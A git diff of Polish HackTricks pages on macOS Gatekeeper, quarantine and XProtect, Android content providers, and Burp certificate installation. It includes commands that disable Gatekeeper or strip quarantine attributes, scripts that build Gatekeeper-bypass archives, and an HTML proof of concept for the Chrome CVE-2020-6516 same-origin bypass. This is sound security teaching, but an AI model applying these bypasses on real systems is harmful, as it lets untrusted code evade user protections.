Po **pobraniu** aplikacji lub pliku, określone **aplikacje macOS**, takie jak przeglądarki internetowe lub klienty poczty elektronicznej, **dołączają rozszerzony atrybut pliku**, powszechnie znany jako "**flaga kwarantanny**", do pobranego pliku. Ten atrybut działa jako środek bezpieczeństwa, aby **oznaczyć plik** jako pochodzący z niezaufanego źródła (internetu) i potencjalnie niosący ryzyko. Jednak nie wszystkie aplikacje dołączają ten atrybut, na przykład zwykłe oprogramowanie klientów BitTorrent zazwyczaj omija ten proces.
Po **pobraniu** aplikacji lub pliku, określone **aplikacje macOS**, takie jak przeglądarki internetowe czy klienty poczty elektronicznej, **dołączają rozszerzony atrybut pliku**, powszechnie znany jako "**flaga kwarantanny**", do pobranego pliku. Ten atrybut działa jako środek bezpieczeństwa, **oznaczając plik** jako pochodzący z niezaufanego źródła (internetu) i potencjalnie niosący ryzyko. Jednak nie wszystkie aplikacje dołączają ten atrybut, na przykład popularne oprogramowanie klientów BitTorrent zazwyczaj omija ten proces.
**Obecność flagi kwarantanny sygnalizuje funkcję bezpieczeństwa Gatekeeper macOS, gdy użytkownik próbuje uruchomić plik**.
W przypadku gdy **flaga kwarantanny nie jest obecna** (jak w przypadku plików pobranych za pomocą niektórych klientów BitTorrent), **sprawdzenia Gatekeepera mogą nie zostać wykonane**. Dlatego użytkownicy powinni zachować ostrożność przy otwieraniu plików pobranych z mniej bezpiecznych lub nieznanych źródeł.
{% hint style="info" %}
**Sprawdzanie** **ważności** podpisów kodu to **proces wymagający dużych zasobów**, który obejmuje generowanie kryptograficznych **skrótów** kodu i wszystkich jego pakietowanych zasobów. Ponadto, sprawdzanie ważności certyfikatu polega na **sprawdzeniu online** u serwerów Apple, czy został on unieważniony po wydaniu. Z tych powodów pełne sprawdzenie podpisu kodu i notyfikacji jest **niepraktyczne do uruchamiania za każdym razem, gdy aplikacja jest uruchamiana**.
**Sprawdzanie** **ważności** podpisów kodu to **proces wymagający dużych zasobów**, który obejmuje generowanie kryptograficznych **skrótów** kodu i wszystkich jego pakietowanych zasobów. Ponadto, sprawdzenie ważności certyfikatu polega na **sprawdzeniu online** u serwerów Apple, czy został on unieważniony po wydaniu. Z tych powodów pełne sprawdzenie podpisu kodu i notyfikacji jest **niepraktyczne do uruchamiania za każdym razem, gdy aplikacja jest uruchamiana**.
Dlatego te sprawdzenia są **wykonywane tylko podczas uruchamiania aplikacji z atrybutem kwarantanny**.
Dlatego te sprawdzenia są **wykonywane tylko podczas uruchamiania aplikacji z atrybutem w kwarantannie**.
{% endhint %}
{% hint style="warning" %}
Ten atrybut musi być **ustawiony przez aplikację tworzącą/pobierającą** plik.
Jednak pliki, które są zabezpieczone piaskownicą, będą miały ten atrybut ustawiony dla każdego pliku, który tworzą. Aplikacje niespiaskowane mogą samodzielnie go ustawić lub określić klucz [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) w pliku **Info.plist**, co spowoduje, że system ustawia rozszerzony atrybut `com.apple.quarantine` na utworzonych plikach.
Jednak pliki, które są zabezpieczone piaskownicą, będą miały ten atrybut ustawiony dla każdego pliku, który tworzą. Aplikacje niebędące w piaskownicy mogą samodzielnie go ustawić lub określić klucz [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information\_property\_list/lsfilequarantineenabled?language=objc) w pliku **Info.plist**, co spowoduje, że system ustawia rozszerzony atrybut `com.apple.quarantine` na utworzonych plikach.
{% endhint %}
Możliwe jest **sprawdzenie jego statusu i włączenie/wyłączenie** (wymagane uprawnienia roota) za pomocą:
@ -176,7 +176,7 @@ spctl --enable
spctl --disable
#You can also allow nee identifies to execute code using the binary "spctl"
```
Możesz również **sprawdzić, czy plik ma atrybut rozszerzonej kwarantanny** za pomocą:
Możesz również **sprawdzić, czy plik ma atrybut kwarantanny** za pomocą:
```bash
xattr file.png
com.apple.macl
@ -198,7 +198,7 @@ com.apple.quarantine: 00C1;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5
# Brave -- App
# F643CD5F-6071-46AB-83AB-390BA944DEC5 -- UID assigned to the file downloaded
```
Rzeczywiście proces "może ustawić flagi kwarantanny dla plików, które tworzy" (próbowałem zastosować flagę USER_APPROVED w utworzonym pliku, ale nie została ona zastosowana):
Faktycznie proces "może ustawić flagi kwarantanny dla tworzonych plików" (próbowałem zastosować flagę USER\_APPROVED w utworzonym pliku, ale nie została ona zastosowana):
<details>
@ -264,7 +264,7 @@ return 0;
```
</details>
A **usuń** ten atrybut za pomocą:
I **usuń** ten atrybut za pomocą:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
@ -282,17 +282,17 @@ Informacje o kwarantannie są również przechowywane w centralnej bazie danych
#### **Quarantine.kext**
Rozszerzenie jądra jest dostępne tylko poprzez **pamięć podręczną jądra w systemie**; jednakże, można pobrać **Kernel Debug Kit z https://developer.apple.com/**, który zawiera zsymbolizowaną wersję rozszerzenia.
Rozszerzenie jądra jest dostępne tylko poprzez **pamięć podręczną jądra w systemie**; jednak można pobrać **Kernel Debug Kit z https://developer.apple.com/**, który zawiera zsymbolizowaną wersję rozszerzenia.
### XProtect
XProtect to wbudowana funkcja **antywirusowa** w macOS. XProtect **sprawdza każdą aplikację podczas pierwszego uruchomienia lub modyfikacji w stosunku do swojej bazy danych** znanych złośliwych oprogramowań i niebezpiecznych typów plików. Gdy pobierasz plik za pomocą określonych aplikacji, takich jak Safari, Mail lub Messages, XProtect automatycznie skanuje plik. Jeśli pasuje do jakiegokolwiek znanego złośliwego oprogramowania w swojej bazie danych, XProtect **uniemożliwi uruchomienie pliku** i powiadomi Cię o zagrożeniu.
XProtect to wbudowana funkcja **antywirusowa** w macOS. XProtect **sprawdza każdą aplikację podczas pierwszego uruchomienia lub modyfikacji w stosunku do swojej bazy danych** znanych złośliwych oprogramowań i niebezpiecznych typów plików. Gdy pobierasz plik za pomocą określonych aplikacji, takich jak Safari, Mail lub Wiadomości, XProtect automatycznie skanuje plik. Jeśli pasuje do znanego złośliwego oprogramowania w swojej bazie danych, XProtect **uniemożliwi uruchomienie pliku** i powiadomi Cię o zagrożeniu.
Baza danych XProtect jest **regularnie aktualizowana** przez Apple z nowymi definicjami złośliwego oprogramowania, a te aktualizacje są automatycznie pobierane i instalowane na Twoim Macu. Zapewnia to, że XProtect zawsze jest aktualny z najnowszymi znanymi zagrożeniami.
Baza danych XProtect jest **regularnie aktualizowana** przez Apple nowymi definicjami złośliwego oprogramowania, a te aktualizacje są automatycznie pobierane i instalowane na Twoim Macu. Zapewnia to, że XProtect zawsze jest aktualny z najnowszymi znanymi zagrożeniami.
Warto jednak zauważyć, że **XProtect nie jest pełnoprawnym rozwiązaniem antywirusowym**. Sprawdza tylko określoną listę znanych zagrożeń i nie wykonuje skanowania w czasie rzeczywistym, jak większość oprogramowania antywirusowego.
Możesz uzyskać informacje o najnowszej aktualizacji XProtect uruchamiając:
Możesz uzyskać informacje o najnowszej aktualizacji XProtect, uruchamiając:
{% code overflow="wrap" %}
```bash
@ -300,14 +300,14 @@ system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistC
```
{% endcode %}
XProtect znajduje się w chronionym przez SIP miejscu w **/Library/Apple/System/Library/CoreServices/XProtect.bundle**, a wewnątrz bundla znajdziesz informacje używane przez XProtect:
XProtect znajduje się w chronionym przez SIP miejscu w **/Library/Apple/System/Library/CoreServices/XProtect.bundle**, a wewnątrz bundla znajdziesz informacje, których XProtect używa:
- **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**: Pozwala kodowi z tymi cdhashes na korzystanie z przestarzałych uprawnień.
- **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**: Lista wtyczek i rozszerzeń, które są niedozwolone do załadowania za pomocą BundleID i TeamID lub wskazujące minimalną wersję.
- **`XProtect.bundle/Contents/Resources/XProtect.yara`**: Reguły Yara do wykrywania złośliwego oprogramowania.
- **`XProtect.bundle/Contents/Resources/gk.db`**: Baza danych SQLite3 z haszami zablokowanych aplikacji i TeamIDs.
* **`XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist`**: Pozwala kodowi z tymi cdhashes na korzystanie z przestarzałych uprawnień.
* **`XProtect.bundle/Contents/Resources/XProtect.meta.plist`**: Lista wtyczek i rozszerzeń, które są niedozwolone do załadowania za pomocą BundleID i TeamID lub wskazujących minimalną wersję.
* **`XProtect.bundle/Contents/Resources/XProtect.yara`**: Zasady Yara do wykrywania złośliwego oprogramowania.
* **`XProtect.bundle/Contents/Resources/gk.db`**: Baza danych SQLite3 z haszami zablokowanych aplikacji i TeamIDs.
Należy zauważyć, że istnieje inna aplikacja w **`/Library/Apple/System/Library/CoreServices/XProtect.app`** związana z XProtect, która nie jest związana z procesem Gatekeeper.
Zauważ, że istnieje inna aplikacja w **`/Library/Apple/System/Library/CoreServices/XProtect.app`** związana z XProtect, która nie jest związana z procesem Gatekeeper.
### Nie Gatekeeper
@ -315,25 +315,25 @@ Należy zauważyć, że istnieje inna aplikacja w **`/Library/Apple/System/Libra
Zauważ, że Gatekeeper **nie jest uruchamiany za każdym razem**, gdy uruchamiasz aplikację, tylko _**AppleMobileFileIntegrity**_ (AMFI) będzie tylko **weryfikować podpisy kodu wykonywalnego** podczas uruchamiania aplikacji, która została już uruchomiona i zweryfikowana przez Gatekeeper.
{% endhint %}
Wcześniej było możliwe uruchomienie aplikacji, aby ją zcache'ować za pomocą Gatekeeper, a następnie **zmodyfikowanie plików nie wykonywalnych aplikacji** (takich jak pliki Electron asar lub NIB) i jeśli nie było innych zabezpieczeń, aplikacja była **uruchamiana** z **złośliwymi** dodatkami.
Dlatego wcześniej było możliwe uruchomienie aplikacji, aby ją zbuforować za pomocą Gatekeeper, a następnie **zmodyfikowanie plików nie wykonywalnych aplikacji** (takich jak pliki Electron asar lub NIB) i jeśli nie było innych zabezpieczeń, aplikacja była **uruchamiana** z **złośliwymi** dodatkami.
Jednak teraz to nie jest możliwe, ponieważ macOS **zapobiega modyfikowaniu plików** wewnątrz bundli aplikacji. Więc jeśli spróbujesz ataku [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md), zauważysz, że nie jest już możliwe nadużywanie go, ponieważ po uruchomieniu aplikacji, aby ją zcache'ować za pomocą Gatekeeper, nie będziesz mógł modyfikować bundla. A jeśli zmienisz na przykład nazwę katalogu Contents na NotCon (jak wskazano w exploicie), a następnie uruchomisz główny plik binarny aplikacji, aby ją zcache'ować za pomocą Gatekeeper, spowoduje to błąd i nie zostanie uruchomiona.
Jednak teraz to nie jest możliwe, ponieważ macOS **zapobiega modyfikowaniu plików** wewnątrz bundli aplikacji. Więc jeśli spróbujesz ataku [Dirty NIB](../macos-proces-abuse/macos-dirty-nib.md), zobaczysz, że nie jest już możliwe nadużycie, ponieważ po uruchomieniu aplikacji w celu zbuforowania jej za pomocą Gatekeeper, nie będziesz mógł modyfikować bundla. A jeśli zmienisz na przykład nazwę katalogu Contents na NotCon (jak wskazano w exploicie), a następnie uruchomisz główny plik binarny aplikacji, aby zbuforować go za pomocą Gatekeeper, spowoduje to błąd i nie zostanie uruchomiony.
## Ominięcia Gatekeepera
Każda metoda ominięcia Gatekeepera (umiejętność sprawienia, że użytkownik pobierze coś i uruchomi to, gdy Gatekeeper powinien tego zabronić) jest uważana za lukę w macOS. Oto kilka CVE przypisanych do technik, które pozwalały na ominięcie Gatekeepera w przeszłości:
Każda metoda ominięcia Gatekeepera (umiejętność sprawienia, aby użytkownik pobrał coś i uruchomił to, gdy Gatekeeper powinien tego zabronić) jest uważana za lukę w zabezpieczeniach macOS. Oto kilka CVE przypisanych do technik, które pozwalały na ominięcie Gatekeepera w przeszłości:
### [CVE-2021-1810](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810)
Zauważono, że jeśli **Archive Utility** jest używany do rozpakowania, pliki o **ścieżkach przekraczających 886 znaków** nie otrzymują rozszerzonego atrybutu com.apple.quarantine. Sytuacja ta nieumyślnie pozwala tym plikom na **ominięcie kontroli bezpieczeństwa** Gatekeepera.
Zauważono, że jeśli **Archive Utility** jest używane do rozpakowywania, pliki o **ścieżkach przekraczających 886 znaków** nie otrzymują rozszerzonego atrybutu com.apple.quarantine. Sytuacja ta nieumyślnie pozwala tym plikom na **ominięcie kontroli bezpieczeństwa** Gatekeepera.
Sprawdź [**oryginalny raport**](https://labs.withsecure.com/publications/the-discovery-of-cve-2021-1810) po więcej informacji.
### [CVE-2021-30990](https://ronmasas.com/posts/bypass-macos-gatekeeper)
Gdy aplikacja jest tworzona za pomocą **Automatora**, informacje o tym, czego potrzebuje do wykonania, znajdują się w `application.app/Contents/document.wflow`, a nie w wykonywalnym pliku. Wykonywalny plik to tylko ogólny binarny Automator o nazwie **Automator Application Stub**.
Gdy aplikacja jest tworzona za pomocą **Automatora**, informacje o tym, co musi wykonać, znajdują się w `application.app/Contents/document.wflow`, a nie w wykonywalnym pliku. Wykonywalny plik to tylko ogólny binarny Automator o nazwie **Automator Application Stub**.
Dlatego można sprawić, że `application.app/Contents/MacOS/Automator\ Application\ Stub` **wskaże symboliczny link do innego Automator Application Stub w systemie** i uruchomi to, co jest wewnątrz `document.wflow` (twój skrypt) **bez wywoływania Gatekeepera**, ponieważ rzeczywisty wykonywalny plik nie ma atrybutu kwarantanny.
Dlatego można sprawić, że `application.app/Contents/MacOS/Automator\ Application\ Stub` **wskaże symbolicznym odnośnikiem na inny Automator Application Stub w systemie**, a to spowoduje wykonanie tego, co jest wewnątrz `document.wflow` (twój skrypt) **bez wywoływania Gatekeepera**, ponieważ rzeczywisty plik wykonywalny nie ma atrybutu kwarantanny.
Przykładowa oczekiwana lokalizacja: `/System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub`
@ -341,7 +341,7 @@ Sprawdź [**oryginalny raport**](https://ronmasas.com/posts/bypass-macos-gatekee
### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)
W tym ominięciu utworzono plik zip z aplikacją zaczynając kompresję od `application.app/Contents` zamiast `application.app`. Dlatego **atrybut kwarantanny** został zastosowany do wszystkich **plików z `application.app/Contents`**, ale **nie do `application.app`**, który był sprawdzany przez Gatekeepera, więc Gatekeeper został ominięty, ponieważ gdy uruchomiono `application.app`, **nie miał atrybutu kwarantanny**.
W tym ominięciu został utworzony plik zip z aplikacją zaczynającą kompresję od `application.app/Contents` zamiast od `application.app`. Dlatego **atrybut kwarantanny** został zastosowany do wszystkich **plików z `application.app/Contents`** ale **nie do `application.app`**, który był sprawdzany przez Gatekeepera, więc Gatekeeper został ominięty, ponieważ gdy uruchomiono `application.app`, **nie miał atrybutu kwarantanny.**
```bash
zip -r test.app/Contents test.zip
```
@ -357,16 +357,16 @@ Sprawdź [**oryginalny raport**](https://www.jamf.com/blog/jamf-threat-labs-maco
### [CVE-2022-42821](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/)
ACL **`writeextattr`** może być użyty do zapobieżenia komukolwiek zapisywania atrybutu w pliku:
ACL **`writeextattr`** może być używane do zapobiegania zapisywania atrybutu w pliku:
```bash
touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'
```
Ponadto format pliku **AppleDouble** kopiuje plik wraz z jego ACEs.
Ponadto format pliku **AppleDouble** kopiuje plik wraz z jego ACE.
W [**kodzie źródłowym**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) można zobaczyć, że reprezentacja tekstowa ACL przechowywana w xattr o nazwie **`com.apple.acl.text`** zostanie ustawiona jako ACL w zdekompresowanym pliku. Dlatego jeśli spakowałeś aplikację do pliku zip w formacie pliku **AppleDouble** z ACL, które uniemożliwia zapisywanie innych xattr do niego... xattr kwarantanny nie został ustawiony w aplikacji:
W [**kodzie źródłowym**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) można zobaczyć, że reprezentacja tekstowa ACL przechowywana w xattr o nazwie **`com.apple.acl.text`** zostanie ustawiona jako ACL w zdekompresowanym pliku. Dlatego jeśli spakowano aplikację do pliku zip w formacie pliku **AppleDouble** z ACL, które uniemożliwia zapisywanie innych xattr do niego... xattr kwarantanny nie został ustawiony w aplikacji:
```bash
chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
@ -377,7 +377,7 @@ python3 -m http.server
Sprawdź [**oryginalny raport**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) po więcej informacji.
Zauważ, że to również mogłoby być wykorzystane z AppleArchives:
Należy zauważyć, że to również może być wykorzystane z AppleArchives:
```bash
mkdir app
touch app/test
@ -386,7 +386,7 @@ aa archive -d app -o test.aar
```
### [CVE-2023-27943](https://blog.f-secure.com/discovery-of-gatekeeper-bypass-cve-2023-27943/)
Odkryto, że **Google Chrome nie ustawiał atrybutu kwarantanny** dla pobranych plików z powodu pewnych problemów wewnętrznych systemu macOS.
Odkryto, że **Google Chrome nie ustawiał atrybutu kwarantanny** dla pobranych plików z powodu pewnych wewnętrznych problemów systemu macOS.
### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
@ -404,8 +404,8 @@ aa archive -d test/ -o test.aar
```
{% endcode %}
Bycie w stanie stworzyć plik, który nie będzie miał ustawionego atrybutu kwarantanny, pozwalało **obejść Gatekeepera.** Trikiem było **stworzenie aplikacji pliku DMG** przy użyciu konwencji nazewnictwa AppleDouble (zaczynając od `._`) i stworzenie **widocznego pliku jako dowiązanie symboliczne do tego ukrytego** pliku bez atrybutu kwarantanny.\
Gdy **plik dmg jest uruchamiany**, ponieważ nie ma atrybutu kwarantanny, **obejdzie Gatekeepera**.
Mając możliwość utworzenia pliku, który nie będzie miał ustawionego atrybutu kwarantanny, było **możliwe do ominięcia Gatekeepera.** Trikiem było **utworzenie aplikacji pliku DMG** przy użyciu konwencji nazewnictwa AppleDouble (zaczynając od `._`) i utworzenie **widocznego pliku jako dowiązanie symboliczne do tego ukrytego** pliku bez atrybutu kwarantanny.\
Gdy **plik dmg zostanie uruchomiony**, ponieważ nie ma atrybutu kwarantanny, **omija Gatekeepera**.
```bash
# Create an app bundle with the backdoor an call it app.app
@ -421,10 +421,6 @@ ln -s ._app.dmg s/app/app.dmg
echo "[+] compressing files"
aa archive -d s/ -o app.aar
```
### Zapobiegaj atrybutowi xattr kwarantanny
### Zapobieganie atrybutowi xattr kwarantanny
W paczce ".app", jeśli atrybut kwarantanny nie jest do niej dodany, to **Gatekeeper nie zostanie uruchomiony**.
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
W paczce ".app", jeśli atrybut xattr kwarantanny nie jest do niej dodany, to **Gatekeeper nie zostanie uruchomiony**.

28
mobile-pentesting/android-app-pentesting/content-protocol.md
View file

@ -4,22 +4,22 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
**To jest streszczenie posta [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
### Wymienianie Plików w Magazynie Mediów
Aby wymienić pliki zarządzane przez Magazyn Mediów, można użyć poniższej komendy:
### Wyświetlanie plików w magazynie multimediów
Aby wyświetlić pliki zarządzane przez Magazyn Multimediów, można użyć poniższej komendy:
```bash
$ content query --uri content://media/external/file
```
@ -27,7 +27,7 @@ Dla bardziej przyjaznego dla użytkownika wyjścia, wyświetl tylko identyfikato
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
Dostawcy treści są izolowani we własnej prywatnej przestrzeni nazw. Dostęp do dostawcy wymaga określonego URI `content://`. Informacje o ścieżkach dostępu do dostawcy można uzyskać z manifestów aplikacji lub kodu źródłowego frameworka Androida.
### Dostawcy treści są izolowani we własnej prywatnej przestrzeni nazw. Dostęp do dostawcy wymaga określonego URI `content://`. Informacje o ścieżkach dostępu do dostawcy można uzyskać z manifestów aplikacji lub kodu źródłowego frameworka Androida.
### Dostęp Chrome'a do dostawców treści
Chrome na Androidzie może uzyskać dostęp do dostawców treści za pomocą schematu `content://`, pozwalając na dostęp do zasobów takich jak zdjęcia lub dokumenty eksportowane przez aplikacje innych firm. Aby to zilustrować, plik można wstawić do Magazynu multimediów, a następnie uzyskać do niego dostęp za pomocą Chrome'a:
@ -56,11 +56,11 @@ content query --uri content://media/external/file --projection _id,_data | grep
_Same Origin Policy_ (SOP) to protokół bezpieczeństwa w przeglądarkach, który ogranicza interakcje stron internetowych z zasobami z różnych źródeł, chyba że jest to wyraźnie zezwolone przez politykę Cross-Origin-Resource-Sharing (CORS). Ta polityka ma na celu zapobieganie wyciekom informacji i fałszowaniu żądań między witrynami. Chrome traktuje `content://` jako lokalny schemat, co oznacza bardziej restrykcyjne zasady SOP, gdzie każdy adres URL z lokalnym schematem jest traktowany jako osobne źródło.
Jednak CVE-2020-6516 był podatnością w Chrome, która umożliwiała obejście zasad SOP dla zasobów ładowanych za pomocą adresu URL `content://`. W rezultacie kod JavaScript z adresu URL `content://` mógł uzyskać dostęp do innych zasobów ładowanych za pomocą adresów URL `content://`, co stanowiło istotne zagrożenie dla bezpieczeństwa, zwłaszcza na urządzeniach z systemem Android w wersjach wcześniejszych niż Android 10, gdzie nie było wdrożonego przechowywania zasięgu.
Jednak CVE-2020-6516 był podatnością w Chrome, która umożliwiała obejście zasad SOP dla zasobów ładowanych za pomocą adresu URL `content://`. W rezultacie kod JavaScript z adresu URL `content://` mógł uzyskać dostęp do innych zasobów ładowanych za pomocą adresów URL `content://`, co stanowiło znaczące zagrożenie dla bezpieczeństwa, zwłaszcza na urządzeniach z systemem Android w wersjach wcześniejszych niż Android 10, gdzie nie było wdrożonego przechowywania z zasięgiem.
Poniżej znajduje się przykład koncepcji dowodowej tej podatności, gdzie dokument HTML, po przesłaniu go pod **/sdcard** i dodaniu do Magazynu multimediów, używa `XMLHttpRequest` w swoim kodzie JavaScript do uzyskania dostępu i wyświetlenia zawartości innego pliku w Magazynie multimediów, omijając zasady SOP.
Poniżej znajduje się przykład koncepcji działania tej podatności, gdzie dokument HTML, po przesłaniu go pod **/sdcard** i dodaniu do Magazynu multimediów, używa `XMLHttpRequest` w swoim kodzie JavaScript, aby uzyskać dostęp i wyświetlić zawartość innego pliku w Magazynie multimediów, omijając zasady SOP.
Kod HTML koncepcji dowodowej:
Kod HTML koncepcji działania:
```xml
<html>
<head>
@ -89,7 +89,7 @@ xhr.send();
<body onload="poc()"></body>
</html>
```
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -99,10 +99,10 @@ xhr.send();
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

24
mobile-pentesting/android-app-pentesting/install-burp-certificate.md
View file

@ -14,7 +14,7 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -55,7 +55,7 @@ Po zakończeniu **ponownego uruchomienia urządzenia** certyfikat Burp będzie u
Jeśli **zrootowałeś swoje urządzenie za pomocą Magisc** (być może emulatora) i **nie możesz wykonać** poprzednich **kroków** w celu zainstalowania certyfikatu Burp, ponieważ **system plików jest tylko do odczytu** i nie możesz go ponownie zamontować jako zapisywalny, istnieje inny sposób.
Jak wyjaśniono w [**tym filmie**](https://www.youtube.com/watch?v=qQicUW0svB8), musisz:
Wyjaśnione w [**tym filmie**](https://www.youtube.com/watch?v=qQicUW0svB8) musisz:
1. **Zainstaluj certyfikat CA**: Po prostu **przeciągnij i upuść** certyfikat Burp w formacie DER, **zmieniając rozszerzenie** na `.crt` w telefonie komórkowym, aby był przechowywany w folderze Pobrane i przejdź do `Zainstaluj certyfikat` -> `Certyfikat CA`
@ -65,7 +65,7 @@ Jak wyjaśniono w [**tym filmie**](https://www.youtube.com/watch?v=qQicUW0svB8),
<figure><img src="../../.gitbook/assets/image (51).png" alt="" width="334"><figcaption></figcaption></figure>
2. **Uczyń go zaufanym przez system**: Pobierz moduł Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (plik .zip), **przeciągnij i upuść** go w telefonie, przejdź do aplikacji Magics na telefonie do sekcji **`Moduły`**, kliknij na **`Zainstaluj z pamięci`**, wybierz moduł `.zip` i po zainstalowaniu **ponownie uruchom** telefon:
2. **Zrób go zaufanym przez system**: Pobierz moduł Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (plik .zip), **przeciągnij i upuść** go w telefonie, przejdź do aplikacji Magics w telefonie do sekcji **`Moduły`**, kliknij na **`Zainstaluj z pamięci`**, wybierz moduł `.zip` i po zainstalowaniu **ponownie uruchom** telefon:
<figure><img src="../../.gitbook/assets/image (52).png" alt="" width="345"><figcaption></figcaption></figure>
@ -75,11 +75,11 @@ Jak wyjaśniono w [**tym filmie**](https://www.youtube.com/watch?v=qQicUW0svB8),
## Po Androidzie 14
W najnowszej wersji Androida 14 zaobserwowano znaczną zmianę w obsłudze certyfikatów urzędów certyfikujących (CA) zaufanych przez system. Wcześniej te certyfikaty były przechowywane w **`/system/etc/security/cacerts/`**, dostępne i modyfikowalne przez użytkowników z uprawnieniami roota, co pozwalało na natychmiastowe zastosowanie ich w całym systemie. Jednak w Androidzie 14 lokalizacja przechowywania została przeniesiona do **`/apex/com.android.conscrypt/cacerts`**, katalogu w ścieżce **`/apex`**, który jest z natury niemutowalny.
